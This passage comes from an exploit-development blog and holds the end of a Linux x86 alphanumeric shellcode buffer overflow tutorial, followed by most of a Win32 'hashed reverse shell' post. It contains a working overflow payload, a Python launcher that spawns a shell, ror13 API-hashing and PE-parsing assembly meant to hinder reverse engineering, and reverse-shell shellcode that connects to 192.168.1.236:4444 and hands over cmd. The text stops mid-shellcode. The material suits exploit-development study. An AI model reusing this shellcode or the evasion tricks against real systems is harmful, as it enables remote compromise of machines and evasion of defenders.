<p>Next testing the bof program we found that the buffer overflow with EIP overwrite appens with 136 bytes of input, so doing a little math here we can know that: <br />
136 - 66 (shellcode) - 4 (EIP address overwrite) = 66 bytes <br />
so we can pass the first 6 NOP bytes + 66 shellcode bytes + 4 EIP address redirection bytes. Using Peda we have first to find the adress to land to.</p>
<p><img src="/assets/images/linux/x86/alphanumeric_0.gif" alt="" /><br /></p>
<p>As we can see in this case we can choose an adress at the end of NOP zone before our shellcode so <code class="language-plaintext highlighter-rouge">0xbffff788</code>. Now we can observe what happens in the stack when we use this address</p>
<p><img src="/assets/images/linux/x86/alphanumeric_1.gif" alt="" /><br /></p>
<pre><code class="language-gdb">[------------------------------------stack-------------------------------------]
0000| 0xbffff52c --> 0xbffff530 ("/bin//sh")
0004| 0xbffff530 ("/bin//sh")
0008| 0xbffff534 ("//sh")
0012| 0xbffff538 --> 0x0
0016| 0xbffff53c --> 0xffff80cd
0020| 0xbffff540 --> 0x0
0024| 0xbffff544 --> 0xbffff5d4 --> 0xbffff728 ("/home/bolo/alphanumeric/bof")
0028| 0xbffff548 --> 0xbffff5e0 --> 0xbffff7d4 ("LC_PAPER=it_IT.UTF-8")
[------------------------------------------------------------------------------]
</code></pre>
<p>As we can see we execute perfectly our shellcode since we have to execute it with the <code class="language-plaintext highlighter-rouge">0xffff80cd</code> (int 0x80) instruction. We can see also that the instruction is down 16 words in the stack. So now we can INC ESP 16 times to move the <code class="language-plaintext highlighter-rouge">0xffff80cd</code> address at the top of the stack. INC ESP is in our table of instrctions and has opcdoe 0x44 or “D”.<br />
Last thing, call the <code class="language-plaintext highlighter-rouge">0xffff80cd</code> with a JMP ESP instruction. I know it is not in the table of our approved instruction and that’s the last trick: the JMP ESP opcode is <code class="language-plaintext highlighter-rouge">\xff\xe4</code> and we can put this opcode just before the return address and not inside the shellcode.</p>
<p><img src="/assets/images/linux/x86/alphanumeric_2.gif" alt="" /><br /></p>
<p>So lastly our command is that</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./bof <span class="sb">`</span>perl <span class="nt">-e</span> <span class="s1">'print "\x90"x48 . "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" . "D"x16 . "\xff\xe4\x79\xf7\xff\xbf"'</span><span class="sb">`</span>
</code></pre></div></div>
<p>Putting all toghether in a python script and execute it</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/python
</span><span class="kn">import</span> <span class="nn">os</span>
<span class="k">print</span> <span class="s">"[*] Loading NOP"</span>
<span class="n">z</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">48</span>
<span class="k">print</span> <span class="s">"[*] Loading alphanumeric"</span>
<span class="n">z</span> <span class="o">+=</span> <span class="s">"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"</span>
<span class="k">print</span> <span class="s">"[*] Loading syscall"</span>
<span class="n">z</span> <span class="o">+=</span> <span class="s">"D"</span><span class="o">*</span><span class="mi">16</span>
<span class="k">print</span> <span class="s">"[*] Loading JMP and landing address"</span>
<span class="n">z</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xff\xe4\x79\xf7\xff\xbf</span><span class="s">"</span>
<span class="k">print</span> <span class="s">"[*] Popping the shell..."</span>
<span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">(</span><span class="s">"./bof "</span> <span class="o">+</span> <span class="n">z</span><span class="p">)</span>
</code></pre></div></div>
<p><img src="/assets/images/linux/x86/alphanumeric_3.gif" alt="" /><br /></p>
<h2 id="references">References</h2>
<ul>
<li><a href="http://phrack.org/issues/57/15.html">Phrack Magazine</a></li>
<li><a href="https://nets.ec/Ascii_shellcode#The_Kernel_Interrupt">NetSec wiki</a></li>
<li><a href="https://www.exploit-db.com/docs/english/13127-writing-self-modifying-code-andutilizing-advanced-assembly-techniques.pdf">Exploit-Db docs</a></li>
</ul>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}Win32 Shellcode - Hashed Reverse Shell2019-11-30T00:00:00+00:002019-11-30T00:00:00+00:00https://blackcloud.me/Win32-shellcode-hashed<p><img src="/assets/images/shell.png" alt="" /><br /></p>
<h2 id="introduction">Introduction</h2>
<p>In the last post we wrote a reverse shell using <code class="language-plaintext highlighter-rouge">LoadLibraryA</code> and <code class="language-plaintext highlighter-rouge">GetProcAddress</code> to find a word defined function address in memory. This example is a straight forward process to obtain a shellcode for our porposes but the algorithm just discussed has a weakness: It performs a strcmp against each export name until it finds the correct one. This requires that the full name of each API function the shellcode uses be included as an ASCII string. When the size of the shellcode is constrained, these strings could push the size of the shellcode over the limit.<br />
A common way to address this problem is to calculate a hash of each symbol string and compare the result with a precomputed value stored in the shellcode. The hash function does not need to be sophisticated; it only needs to guarantee that within each DLL used by the shellcode, the hashes that the shellcode uses are unique. Hash collisions between symbols in different DLLs and between symbols the shellcode does not use are fine. The most common hash function is the 32-bit rotate-right-additive hash.<br />
In this post we’ll using hashed name to find functions.</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">hashString:</span>
<span class="nf">push</span> <span class="nb">esi</span>
<span class="nf">push</span> <span class="nb">edi</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">esp</span><span class="o">+</span><span class="mh">0x0c</span><span class="p">]</span> <span class="c1">; load function argument in esi</span>
<span class="nl">calc_hash:</span>
<span class="nf">xor</span> <span class="nb">edi</span><span class="p">,</span> <span class="nb">edi</span>
<span class="nf">cld</span>
<span class="nl">hash_iter:</span>
<span class="nf">xor</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">eax</span>
<span class="nf">lodsb</span> <span class="c1">; load next byte of input string</span>
<span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="nb">ah</span>
<span class="nf">je</span> <span class="nv">hash_done</span> <span class="c1">; check if at end of symbol</span>
<span class="nf">ror</span> <span class="nb">edi</span><span class="p">,</span> <span class="mh">0x0d</span> <span class="c1">; rotate right 13 (0x0d)</span>
<span class="nf">add</span> <span class="nb">edi</span><span class="p">,</span> <span class="nb">eax</span>
<span class="nf">jmp</span> <span class="nv">hash_iter</span>
<span class="nl">hash_done:</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">edi</span>
<span class="nf">pop</span> <span class="nb">edi</span>
<span class="nf">pop</span> <span class="nb">esi</span>
<span class="nf">ret</span> <span class="c1">; use ret against retn 8 that produce NULL bytes</span>
</code></pre></div></div>
<p>This function calculates a 32-bit DWORD hash value of the string pointer argument. The EDI register is treated as the current hash value, and is initialized to zero. Each byte of the input string is loaded via the lodsb instruction at <code class="language-plaintext highlighter-rouge">lodsb</code>. If the byte is not NULL, the current hash is rotated right by 13 <code class="language-plaintext highlighter-rouge">0x0d</code> in hex, and the current byte is added into the hash. This hash is returned in EAX so that its caller can compare the result with the value compiled into the code.<br />
This PE parsing ability instead of <code class="language-plaintext highlighter-rouge">GetProcAddress</code> approach has the additional benefit of making reverse-engineering of the shellcode more difficult. The hash values hide the API calls used from casual inspection.</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">findSymbolByHash:</span>
<span class="nf">pushad</span>
<span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x24</span><span class="p">]</span> <span class="c1">; load 1st arg: dllBase</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebp</span> <span class="o">+</span> <span class="mh">0x3c</span><span class="p">]</span> <span class="c1">; get offset to PE signature</span>
<span class="c1">; load edx w/ DataDirectories array: assumes PE32</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebp</span> <span class="o">+</span> <span class="nb">eax</span> <span class="o">+</span> <span class="mi">4</span><span class="o">+</span><span class="mi">20</span><span class="o">+</span><span class="mi">96</span><span class="p">]</span>
<span class="nf">add</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; edx:= addr IMAGE_EXPORT_DIRECTORY</span>
<span class="nf">mov</span> <span class="nb">ecx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x18</span><span class="p">]</span> <span class="c1">; ecx:= NumberOfNames</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span> <span class="o">+</span> <span class="mh">0x20</span><span class="p">]</span> <span class="c1">; ebx:= RVA of AddressOfNames</span>
<span class="nf">add</span> <span class="nb">ebx</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="nl">search_loop:</span>
<span class="nf">dec</span> <span class="nb">ecx</span> <span class="c1">; dec loop counter</span>
<span class="c1">; esi:= next name, uses ecx*4 because each pointer is 4 bytes</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span><span class="o">+</span><span class="nb">ecx</span><span class="o">*</span><span class="mi">4</span><span class="p">]</span>
<span class="nf">add</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="nf">push</span> <span class="nb">esi</span>
<span class="nf">call</span> <span class="nb">edi</span> <span class="c1">; call hashString to obtain the current string</span>
<span class="nf">add</span> <span class="nb">sp</span><span class="p">,</span> <span class="mi">4</span> <span class="c1">; avoid NULL bytes </span>
<span class="c1">; check hash result against arg #2 on stack: symHash</span>
<span class="nf">cmp</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x28</span><span class="p">]</span>
<span class="nf">jnz</span> <span class="nv">search_loop</span>
<span class="c1">; at this point we found the string in AddressOfNames</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span><span class="o">+</span><span class="mh">0x24</span><span class="p">]</span> <span class="c1">; ebx:= ordinal table rva</span>
<span class="nf">add</span> <span class="nb">ebx</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="c1">; turn cx into ordinal from name index.</span>
<span class="c1">; use ecx*2: each value is 2 bytes</span>
<span class="nf">mov</span> <span class="nb">cx</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span><span class="o">+</span><span class="nb">ecx</span><span class="o">*</span><span class="mi">2</span><span class="p">]</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">edx</span><span class="o">+</span><span class="mh">0x1c</span><span class="p">]</span> <span class="c1">; ebx:= RVA of AddressOfFunctions</span>
<span class="nf">add</span> <span class="nb">ebx</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="c1">; eax:= Export function rva. Use ecx*4: each value is 4 bytes</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">ebx</span><span class="o">+</span><span class="nb">ecx</span><span class="o">*</span><span class="mi">4</span><span class="p">]</span>
<span class="nf">add</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">ebp</span> <span class="c1">; rva->va</span>
<span class="nl">done:</span>
<span class="nf">mov</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x1c</span><span class="p">],</span> <span class="nb">eax</span> <span class="c1">; overwrite eax saved on stack</span>
<span class="nf">popad</span>
<span class="nf">ret</span> <span class="c1">; use ret against retn 4 that produce NULL bytes</span>
</code></pre></div></div>
<p>The code begins parsing the PE file to get the pointer to the PE signature. A pointer to <code class="language-plaintext highlighter-rouge">IMAGE_EXPORT_DIRECTORY</code> is created by adding the correct offset, assuming this is a 32-bit PE file. The code begins parsing the <code class="language-plaintext highlighter-rouge">IMAGE_EXPORT_DIRECTORY</code> structure, loading the <code class="language-plaintext highlighter-rouge">NumberOfNames</code> value and the <code class="language-plaintext highlighter-rouge">AddressOfNames</code> pointer. Each string pointer in <code class="language-plaintext highlighter-rouge">AddressOfNames</code> is passed to the <code class="language-plaintext highlighter-rouge">hashString</code> function, and the result of this calculation is compared against the value passed as the function argument. Once the correct index into <code class="language-plaintext highlighter-rouge">AddressOfNames</code> is found, it is used as an index into the <code class="language-plaintext highlighter-rouge">AddressOfNameOrdinals</code> array to obtain the corresponding ordinal value, which is used as an index into the <code class="language-plaintext highlighter-rouge">AddressOfFunctions</code> array. This is the value the user wants, so it is written to the stack, overwriting the EAX value saved by the <code class="language-plaintext highlighter-rouge">pushad</code> instruction so that this value is preserved by the following <code class="language-plaintext highlighter-rouge">popad</code> instruction.<br />
To calculate the hash string of ours function we can use a simple script found on <a href="https://reverseengineering.stackexchange.com/questions/17289/how-to-find-a-fuction-hash-when-manually-resolving-in-shellcode">StackExchange</a></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/python
</span><span class="kn">import</span> <span class="nn">sys</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">def</span> <span class="nf">rol32</span><span class="p">(</span><span class="n">val</span><span class="p">,</span> <span class="n">amt</span><span class="p">):</span>
<span class="k">return</span> <span class="p">(</span> <span class="p">(</span><span class="n">val</span> <span class="o"><<</span> <span class="n">amt</span><span class="p">)</span> <span class="o">&</span> <span class="mh">0xffffffff</span> <span class="p">)</span> <span class="o">|</span> <span class="p">(</span> <span class="p">(</span> <span class="n">val</span> <span class="o">>></span> <span class="p">(</span><span class="mi">32</span> <span class="o">-</span> <span class="n">amt</span><span class="p">)</span> <span class="p">)</span> <span class="o">&</span> <span class="mh">0xffffffff</span> <span class="p">)</span>
<span class="k">def</span> <span class="nf">ror32</span><span class="p">(</span><span class="n">val</span><span class="p">,</span> <span class="n">amt</span><span class="p">):</span>
<span class="k">return</span> <span class="p">(</span> <span class="p">(</span><span class="n">val</span> <span class="o">>></span> <span class="n">amt</span><span class="p">)</span> <span class="o">&</span> <span class="mh">0xffffffff</span> <span class="p">)</span> <span class="o">|</span> <span class="p">(</span> <span class="p">(</span> <span class="n">val</span> <span class="o"><<</span> <span class="p">(</span><span class="mi">32</span> <span class="o">-</span> <span class="n">amt</span><span class="p">)</span> <span class="p">)</span> <span class="o">&</span> <span class="mh">0xffffffff</span> <span class="p">)</span>
<span class="k">def</span> <span class="nf">add32</span><span class="p">(</span><span class="n">val</span><span class="p">,</span> <span class="n">amt</span><span class="p">):</span>
<span class="k">return</span> <span class="p">(</span><span class="n">val</span> <span class="o">+</span> <span class="n">amt</span><span class="p">)</span> <span class="o">&</span> <span class="mh">0xffffffff</span>
<span class="k">def</span> <span class="nf">hash_export</span><span class="p">(</span><span class="n">name</span><span class="p">):</span>
<span class="n">result</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">index</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span><span class="p">(</span><span class="n">index</span> <span class="o"><</span> <span class="nb">len</span><span class="p">(</span><span class="n">name</span><span class="p">)):</span>
<span class="n">result</span> <span class="o">=</span> <span class="n">add32</span><span class="p">(</span><span class="n">ror32</span><span class="p">(</span><span class="n">result</span><span class="p">,</span> <span class="mi">13</span><span class="p">),</span> <span class="nb">ord</span><span class="p">(</span><span class="n">name</span><span class="p">[</span><span class="n">index</span><span class="p">])</span> <span class="o">&</span> <span class="mh">0xff</span><span class="p">)</span>
<span class="n">index</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">return</span> <span class="n">result</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="k">print</span> <span class="nb">hex</span><span class="p">(</span><span class="n">hash_export</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div></div>
<p>The original one makes a right rotation but we can also use a left rotation or can use shift instead of rotation. It’s manadatory that all changes made on the script must be done also in the ASM shellcode.</p>
<p><img src="/assets/images/windows/x86/reverse_shell_hash_1.png" alt="" /><br /></p>
<h2 id="the-shellcode">The shellcode</h2>
<p>First thing we choosed to load the <code class="language-plaintext highlighter-rouge">hashString</code> and <code class="language-plaintext highlighter-rouge">findSymbolByHash</code> addresses respectively in <code class="language-plaintext highlighter-rouge">EBP</code> and <code class="language-plaintext highlighter-rouge">EDI</code> registers to avoid NULL bytes produced by calling directly this function during the process, secondly by using the PE parsing, we choosed to find and store all the necessary functions addresses at the begin of our shellcode and use <code class="language-plaintext highlighter-rouge">ESI</code> register like a base offset for our saved addresses.<br />
Last thing, we used a lot of code of previous shellcode, probably some pieces could be optimized.<br />
The shellcode works on both x86 Win 7 and Win 10 but assuming the fact:</p>
<blockquote>
<p>The particular algorithm has become commonly used due to its inclusion in <a href="https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm">Metasploit</a>, but variations that use different rotation amounts and hash sizes are sometimes seen.<br /></p>
</blockquote>
<p>You must note that this could makes our shellcode marked as malicious by Windows Defender AV and others AV and IDS/IPS/ATP agents :)
You could read an interesting article on <a href="https://www.fireeye.com/blog/threat-research/2012/11/precalculated-string-hashes-reverse-engineering-shellcode.html">Fireeye</a> blog, about this argument.</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">global</span> <span class="nv">_start</span>
<span class="nf">section</span> <span class="nv">.text</span>
<span class="nl">_start:</span>
<span class="c1">; this avoid the NULL bytes producted by calling functions directly</span>
<span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nv">findSymbolByHash</span>
<span class="nf">mov</span> <span class="nb">edi</span><span class="p">,</span> <span class="nv">hashString</span>
<span class="nl">getKernel32Base:</span>
<span class="nf">xor</span> <span class="nb">ecx</span><span class="p">,</span> <span class="nb">ecx</span> <span class="c1">; zeroing register ECX</span>
<span class="nf">mul</span> <span class="nb">ecx</span> <span class="c1">; zeroing register EAX EDX</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">fs</span><span class="p">:</span><span class="nb">ecx</span> <span class="o">+</span> <span class="mh">0x030</span><span class="p">]</span> <span class="c1">; PEB loaded in eax</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x00c</span><span class="p">]</span> <span class="c1">; LDR loaded in eax</span>
<span class="nf">mov</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x014</span><span class="p">]</span> <span class="c1">; InMemoryOrderModuleList loaded in esi</span>
<span class="nf">lodsd</span> <span class="c1">; program.exe address loaded in eax (1st module)</span>
<span class="nf">xchg</span> <span class="nb">esi</span><span class="p">,</span> <span class="nb">eax</span>
<span class="nf">lodsd</span> <span class="c1">; ntdll.dll address loaded (2nd module)</span>
<span class="nf">mov</span> <span class="nb">ebx</span><span class="p">,</span> <span class="p">[</span><span class="nb">eax</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">]</span> <span class="c1">; kernel32.dll address loaded in ebx (3rd module)</span>
<span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="nb">ebx</span>
<span class="c1">; EAX 76140000 kernel32.76140000</span>
<span class="c1">; ECX 00000000</span>
<span class="c1">; EDX 00000000</span>
<span class="c1">; EBX 76140000 kernel32.76140000</span>
<span class="c1">; ESP 0022FF8C</span>
<span class="c1">; EBP 0022FF94</span>
<span class="c1">; ESI 0054190C</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 00401005 reverse_.00401005</span>
<span class="nf">push</span> <span class="mh">0xec0e4e8e</span> <span class="c1">; LoadLibraryA hash</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; call findSymbolByHash</span>
<span class="c1">; EAX 76192864 kernel32.LoadLibraryA</span>
<span class="c1">; ECX 00000000</span>
<span class="c1">; EDX 00000000</span>
<span class="c1">; EBX 76140000 kernel32.76140000</span>
<span class="c1">; ESP 0022FF8C</span>
<span class="c1">; EBP 0022FF94</span>
<span class="c1">; ESI 0054190C</span>
<span class="c1">; EDI 00000000</span>
<span class="c1">; EIP 00401010 reverse_.00401010</span>
<span class="nl">getws2_32:</span>
<span class="nf">push</span> <span class="mh">0x61613233</span> <span class="c1">; 23</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x2</span><span class="p">],</span> <span class="mh">0x6161</span> <span class="c1">; sub aa from aa23_2sw</span>
<span class="nf">push</span> <span class="mh">0x5f327377</span> <span class="c1">; _2sw</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; pointer to the string</span>
<span class="nf">call</span> <span class="nb">eax</span> <span class="c1">; call Loadlibrary and find ws2_32.dll</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">eax</span> <span class="c1">; save winsock handle for future puproses</span>
<span class="c1">; EAX 75FE0000 OFFSET ws2_32.#332</span>
<span class="c1">; ECX 77BE316F ntdll.77BE316F</span>
<span class="c1">; EDX 75FE0000 OFFSET ws2_32.#332</span>
<span class="c1">; EBX 760C0000 kernel32.760C0000</span>
<span class="c1">; ESP 0022FF84 ASCII "ws2_32"</span>
<span class="c1">; EBP 004010F7 reverse_.004010F7</span>
<span class="c1">; ESI 0054190C</span>
<span class="c1">; EDI 00401140 reverse_.00401140</span>
<span class="c1">; EIP 00401040 reverse_.00401040</span>
<span class="nl">getWSAStartup:</span>
<span class="nf">push</span> <span class="mh">0x3bfcedcb</span> <span class="c1">; WSAStartup hash</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; push ws2_32.dll handler</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; find WSAStartup in ws2_32.dll handler</span>
<span class="nf">add</span> <span class="nb">sp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">push</span> <span class="nb">eax</span>
<span class="nf">lea</span> <span class="nb">esi</span><span class="p">,</span> <span class="p">[</span><span class="nb">esp</span><span class="p">]</span>
<span class="nf">mov</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x4</span><span class="p">],</span> <span class="nb">eax</span>
<span class="nl">getWSASocketA:</span>
<span class="nf">push</span> <span class="mh">0xadf509d9</span> <span class="c1">; WSASocketA hash</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; push ws2_32.dll handler</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; find WSASocketA in ws2_32.dll handler</span>
<span class="nf">add</span> <span class="nb">sp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">mov</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x8</span><span class="p">],</span> <span class="nb">eax</span>
<span class="nl">getConnect:</span>
<span class="nf">push</span> <span class="mh">0x60aaf9ec</span> <span class="c1">; connect hash</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; push ws2_32.dll handler</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; find connect in ws2_32.dll handler</span>
<span class="nf">add</span> <span class="nb">sp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">mov</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0xc</span><span class="p">],</span> <span class="nb">eax</span>
<span class="nl">getCreateProcessA:</span>
<span class="nf">push</span> <span class="mh">0x16b3fe72</span> <span class="c1">; CreateProcessA hash</span>
<span class="nf">push</span> <span class="nb">ebx</span> <span class="c1">; push kernel32.dll handler</span>
<span class="nf">call</span> <span class="nb">ebp</span> <span class="c1">; find CreateProcessA in kernel32.dll handler</span>
<span class="nf">add</span> <span class="nb">sp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">mov</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x10</span><span class="p">],</span> <span class="nb">eax</span>
<span class="nl">getExitProcess:</span>
<span class="nf">push</span> <span class="mh">0x73e2d87e</span> <span class="c1">; ExitProcess hash</span>
<span class="nf">push</span> <span class="nb">ebx</span> <span class="c1">; kernel32 dll location</span>
<span class="nf">call</span> <span class="nb">ebp</span>
<span class="nf">add</span> <span class="nb">sp</span><span class="p">,</span> <span class="mi">8</span>
<span class="nf">mov</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x14</span><span class="p">],</span> <span class="nb">eax</span>
<span class="nl">callWSAStartUp:</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span>
<span class="nf">mov</span> <span class="nb">dx</span><span class="p">,</span> <span class="mh">0x190</span> <span class="c1">; EAX = sizeof( struct WSAData )</span>
<span class="nf">sub</span> <span class="nb">esp</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; alloc some space for the WSAData structure</span>
<span class="nf">push</span> <span class="nb">esp</span> <span class="c1">; push a pointer to this stuct</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; push the wVersionRequested parameter</span>
<span class="nf">call</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x4</span><span class="p">]</span> <span class="c1">; call WSAStartup(MAKEWORD(2, 2), wsadata_pointer)</span>
<span class="nl">callWSASocketA:</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span> <span class="c1">; clear edx</span>
<span class="nf">push</span> <span class="nb">edx</span><span class="c1">; ; dwFlags=NULL</span>
<span class="nf">push</span> <span class="nb">edx</span><span class="c1">; ; g=NULL</span>
<span class="nf">push</span> <span class="nb">edx</span><span class="c1">; ; lpProtocolInfo=NULL</span>
<span class="nf">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="mh">0x6</span> <span class="c1">; protocol=6</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">sub</span> <span class="nb">dl</span><span class="p">,</span> <span class="mh">0x5</span> <span class="c1">; edx==1</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">; type=1</span>
<span class="nf">inc</span> <span class="nb">edx</span> <span class="c1">; af=2</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">call</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0x8</span><span class="p">]</span> <span class="c1">; call WSASocketA</span>
<span class="nf">push</span> <span class="nb">eax</span> <span class="c1">; save eax in edi</span>
<span class="nf">pop</span> <span class="nb">edi</span> <span class="c1">; </span>
<span class="nl">callConnect:</span>
<span class="c1">;set up sockaddr_in</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="mh">0xed02a9c1</span> <span class="c1">;the IP plus 0x11111111 so we avoid NULLs (IP=192.168.1.236)</span>
<span class="nf">sub</span> <span class="nb">edx</span><span class="p">,</span> <span class="mh">0x01010101</span> <span class="c1">;subtract from edx to obtain the real IP</span>
<span class="nf">push</span> <span class="nb">edx</span> <span class="c1">;push sin_addr</span>
<span class="nf">push</span> <span class="kt">word</span> <span class="mh">0x5c11</span> <span class="c1">;0x115c = (port 4444)</span>
<span class="nf">xor</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">edx</span>
<span class="nf">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="mi">2</span>
<span class="nf">push</span> <span class="nb">dx</span>
<span class="nf">mov</span> <span class="nb">edx</span><span class="p">,</span> <span class="nb">esp</span>
<span class="nf">push</span> <span class="kt">byte</span> <span class="mh">0x10</span>
<span class="nf">push</span> <span class="nb">edx</span>
<span class="nf">push</span> <span class="nb">edi</span>
<span class="nf">call</span> <span class="kt">dword</span> <span class="p">[</span><span class="nb">esi</span><span class="o">+</span><span class="mh">0xc</span><span class="p">]</span>
<span class="nl">shell:</span>
<span class="nf">push</span> <span class="mh">0x61646d63</span> <span class="c1">; push admc</span>
<span class="nf">sub</span> <span class="kt">word</span> <span class="p">[</span><span class="nb">esp</span> <span class="o">+</span> <span class="mh">0x3</span><span class="p">],</span> <span class="mh">0x61</span> <span class="c1">; sub a to admc = dmc</span>
<span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nb">esp</span> <span class="c1">; save a pointer to the command line</span>
<span class="nf">push</span> <span class="nb">edi</span> <span class="c1">; our socket becomes the shells hStdError</span>
